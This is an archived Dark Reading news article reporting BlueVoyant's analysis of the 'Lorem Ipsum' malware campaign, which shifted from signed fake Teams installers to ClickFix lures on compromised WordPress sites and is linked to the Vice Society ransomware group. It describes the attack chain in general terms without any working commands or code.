CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 16, 2026

'Lorem Ipsum' Malware Pivots to ClickFix Delivery

Dark Reading Archived Jun 16, 2026 ✓ Full text saved

New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society.

Full text archived locally
✦ AI Summary · Claude Sonnet


    CYBERATTACKS & DATA BREACHES CYBER RISK THREAT INTELLIGENCE NEWS 'Lorem Ipsum' Malware Pivots to ClickFix Delivery New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society. Jai Vijayan,Contributing Writer June 16, 2026 4 Min Read SOURCE: M REHAN330 VIA SHUTTERSTOCK Microsoft's disruption of malware-signing-as-a-service provider Fox Tempest last month has forced the operators of the Lorem Ipsum shellcode loader and backdoor to abandon their delivery method of Trojanized Microsoft Teams installers in favor of ClickFix lures. Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates. While the takedown may have temporarily disrupted the threat actors behind Lorem Ipsum, they quickly moved to a new and potentially more dangerous delivery model. Making a Quick Pivot to ClickFix "The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely," BlueVoyant said in its report on Tuesday.  Related:The Beginning of the End of Social Engineering Instead, the threat actors are now relying on ClickFix lures hosted on compromised WordPress sites to deliver their malware. "The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites," the company noted. BlueVoyant had initially assessed Lorem Ipsum, to be a rapidly maturing malware campaign likely operated by a sophisticated, mid-tier initial access broker that launched in February 2026. The company has since revised that assessment and now strongly believes the campaign is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. The threat actor has been active since at least mid-2022 and is associated with multiple ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker, according to BlueVoyant. The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems.  BlueVoyant's analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead-drop to retrieve C2 server addresses. The malware also assigns unique identifiers to track and manage individual victim infections, according to BlueVoyant. Related:Chinese, N. Korean Threat Groups Build on Asia-Pacific Success ClickFix Lures on WordPress Sites For the new ClickFix delivery model, Lorem Ipsum's operator is currently using at least five legitimate but compromised WordPress websites to host its ClickFix lures. The attack chain begins when a user arrives at one of the websites, which span multiple sectors including architecture, legal services and construction technology. An injected iframe on the website displays a fake browser update notification about the user's browser being out of date. In a manner similar to other ClickFix scams, the pop-op instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into their Windows Terminal. Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message telling the user their browser has been successfully updated.  A Troubling Connection to Ransomware Actors BlueVoyant's view that Lorem Ipsum is linked to Rapid Brigantine is significant for defenders because it suggests the campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims. According to the security vendor, there are multiple indicators that the two operations are linked. These include a Microsoft report in October 2025 that described SEO poisoning-driven Vanilla Tempest campaign involving Teams installers; the shared use of Forging Marauder/Fox Tempest for obtaining malware signing certificates; and a DFIR report where a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine. Related:Silent Ransom Group Hits US Law Firms in Escalating Extortion Attacks The Lorem Ipsum campaign is the latest example of the resilience modern threat actors have built up against attempts to disrupt their operations. Rather than allowing Microsoft's takedown of the Fox Tempest signing service to disrupt their operations, Lorem Ipsum actors pivoted to a new delivery model that has actually heightened their threat profile. For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Instead, organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate Web infrastructure abuse, and user execution of malicious commands, BueVoyant noted.  "Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption," the security vendor said. "The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine's multiple delivery pipelines," rather than individual delivery mechanisms or malware variants. About the Author Jai Vijayan Contributing Writer Illinois-based Jai Vijayan is a veteran, award-winning technology journalist with more than 25 years of experience covering cybersecurity. His information security reporting has explored everything from ransomware, nation-state threats, and identity security to AI risk, critical infrastructure protection, software supply chain security, cloud security and emerging enterprise technologies.  Over the course of his career, Jai has written news stories, feature articles, survey reports, white papers, and e-books for enterprise and technology audiences. He has also moderated panel discussions and executive roundtables featuring CISOs, security researchers, and industry leaders.  Jai previously served as senior editor at Computerworld, where he covered information security and data-privacy issues. His work has also appeared in CSO Online, InformationWeek, The Christian Science Monitor Passcode, The Economic Times, and other publications. His work has earned multiple industry honors, including a Joint ASBPE Excellence Award for Best Coverage of Government IT, and a Joint Jesse H. Neal Award for wireless LAN security coverage. Jai holds a Master’s degree in statistics from Bangalore University, and studied broadcasting and electronic communication at Marquette University in Milwaukee.   Want more Dark Reading stories in your Google search results? ADD US NOW More Insights Industry Reports How Organizations Are Managing Incident Response How Enterprises Are Developing Secure Applications Inside RSAC 2026: security leaders reveal the risks redefining your defense strategy Essential News & Insights from Black Hat USA 2025 How Enterprises Are Harnessing Emerging Technologies in Cybersecurity Access More Research Webinars Advanced Persistent Threats: A Practical Guide to Detection and Response The Frontier AI Era: Why Cybersecurity Must Move at Machine Speed Build vs. Buy: The Hidden Cost of Building Your Own AI Security Stack Defending in the Shadow Era: When the CVE Feed Goes Dark Building SecOps That Make the Most of Every Dollar More Webinars You May Also Like CYBERATTACKS & DATA BREACHES Critical Fortinet Flaws Under Active Attack by Jai Vijayan, Contributing Writer DEC 17, 2025 CYBERATTACKS & DATA BREACHES CISA Warns of 'Ongoing' Brickstorm Backdoor Attacks by Rob Wright DEC 04, 2025 CYBERATTACKS & DATA BREACHES F5 BIG-IP Environment Breached by Nation-State Actor by Alexander Culafi OCT 15, 2025 CYBERATTACKS & DATA BREACHES Jaguar Land Rover Shows Cyberattacks Mean (Bad) Business by Robert Lemos, Contributing Writer OCT 03, 2025 Editor's Choice CYBERSECURITY OPERATIONS 20 Leaders Who Built the CISO Era: 2 Decades of Change byDark Reading Editorial Team MAY 12, 2026 41 MIN READ APPLICATION SECURITY It's Patch Tuesday for Microsoft & Not a Zero-Day In Sight byJai Vijayan MAY 12, 2026 5 MIN READ CYBERATTACKS & DATA BREACHES Instructure Breach Exposes Schools' Vendor Dependence byAlexander Culafi MAY 6, 2026 4 MIN READ Want more Dark Reading stories in your Google search results? Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE AUG 1-6 | MANDALAY BAY, LAS VEGAS USE CODE: DARKREADING & SAVE $200 ON A BRIEFINGS PASS OR $100 ON A BUSINESS PASS The premier cybersecurity event returns. GET YOUR PASS ANATOMY OF A DATA BREACH This comprehensive virtual event examines the main vulnerabilities and exploits that lead to enterprise data breaches, plus the latest tools and best practices for conducting incident response. BEAT HACKERS TO IT
    💬 Team Notes
    Article Info
    Source
    Dark Reading
    Category
    ◇ Industry News & Leadership
    Published
    Jun 16, 2026
    Archived
    Jun 16, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗